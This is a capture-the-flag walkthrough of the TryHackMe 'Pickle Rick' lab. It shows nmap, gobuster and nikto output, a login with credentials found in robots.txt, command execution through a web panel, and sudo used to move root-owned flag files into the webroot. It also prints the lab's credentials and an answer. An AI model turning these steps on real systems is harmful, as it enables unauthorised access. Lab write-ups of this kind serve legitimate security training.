THM — Pickle Rick
Nmap Scan
root@kali:~# nmap -sC -sV -O -T4 10.10.202.157Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-04 01:07 ESTNmap scan report for 10.10.202.157Host is up (0.36s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 2048 5e:f6:90:db:53:33:48:65:85:58:47:38:e1:b1:3e:92 (RSA)| 256 1c:42:c6:81:88:0d:cb:4a:99:1f:60:58:65:9a:55:ee (ECDSA)|_ 256 c9:e8:9e:19:f8:c2:97:1a:4a:f7:df:18:27:45:b6:89 (ED25519)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: Rick is sup4r coolNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.80%E=4%D=1/4%OT=22%CT=1%CU=43191%PV=Y%DS=4%DC=I%G=Y%TM=5FF2B108OS:%P=x86_64-pc-linux-gnu)SEQ(SP=F8%GCD=1%ISR=10F%TI=Z%CI=I%II=I%TS=8)SEQ(SOS:P=F5%GCD=1%ISR=10E%TI=Z%CI=I%TS=8)SEQ(SP=FB%GCD=1%ISR=10E%TI=Z%II=I%TS=8OS:)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M50OS:8ST11NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DFOS:)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)OS:T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%AOS:=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DOS:F=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=4OS:0%CD=S)Network Distance: 4 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 75.59 seconds
Gobuster Scan
root@kali:~# gobuster dir -u 10.10.202.157 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html,.txt===============================================================Gobuster v3.0.1by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)===============================================================[+] Url: http://10.10.202.157[+] Threads: 10[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt[+] Status codes: 200,204,301,302,307,401,403[+] User Agent: gobuster/3.0.1[+] Extensions: php,html,txt[+] Timeout: 10s===============================================================2021/01/04 01:11:06 Starting gobuster===============================================================/index.html (Status: 200)/login.php (Status: 200)/assets (Status: 301)/portal.php (Status: 302)/robots.txt (Status: 200)Progress: 9230 / 220561 (4.18%)^C[!] Keyboard interrupt detected, terminating.===============================================================2021/01/04 01:33:50 Finished===============================================================
Nikto scan
root@kali:/opt/nikto/program# ./nikto.pl -h 10.10.202.157- Nikto v2.1.6---------------------------------------------------------------------------+ Target IP: 10.10.202.157+ Target Hostname: 10.10.202.157+ Target Port: 80+ Start Time: 2021-01-04 01:31:06 (GMT-5)---------------------------------------------------------------------------+ Server: Apache/2.4.18 (Ubuntu)+ The anti-clickjacking X-Frame-Options header is not present.+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.+ No CGI Directories found (use '-C all' to force check all possible dirs)+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.+ Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip+ Cookie PHPSESSID created without the httponly flag+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS+ OSVDB-3233: /icons/README: Apache default file found.+ /login.php: Admin login page/section found.+ 8079 requests: 0 error(s) and 8 item(s) reported on remote host+ End Time: 2021-01-04 02:22:35 (GMT-5) (3089 seconds)---------------------------------------------------------------------------+ 1 host(s) tested
The homepage of the URL.
Found a username: R1ckRul3s
/login.php
Found a login page.
Testing with admin:admin
credentials. Seems like we might not be able to check if a particular username is valid or not.
/assets
Nothing much here.
/robots.txt
Found a weird string. Might be a password or something.
Let’s try to login in with this set of credentials.
R1ckRul3s:Wubbalubbadubdub
And I was able to log in.
Since it is running on Linux, we can try ls
command.
Trying cat Sup3rS3cretPickl3Ingred.txt
does not work as shown below.
whoami
pwd
Tried to get a reverse shell through OS injection, but failed to do so.
With the help of this page.
Since we cant cat the content out, I realized we could just simply head to that page since all the files listed out are stored in the webroot directory.
Found the first ingredient.
Using the clue, let’s look around the system for the other ingredients.
ls /home
ls /home/rick
sudo -l
Looks like we can execute any command using sudo.
sudo ls /root
sudo ls /root && cat 3rd.txt
don't work too since cat command
has been disabled.
sudo mv /root/3rd.txt /var/www/html
With this command, I was able to move the file from the root folder to the HTML folder so I can view the contents through the browser.
The third ingredient found: fleeb juice.
Now let’s hunt the second ingredient.
mv /home/rick/’second ingredients’ /var/www/html
can't seem to work.
Let’s view the permission for the folder second ingredients
Looks like I have to use sudo to move this folder.
sudo mv /home/rick/’second ingredients’ /var/www/html
Found the second ingredient.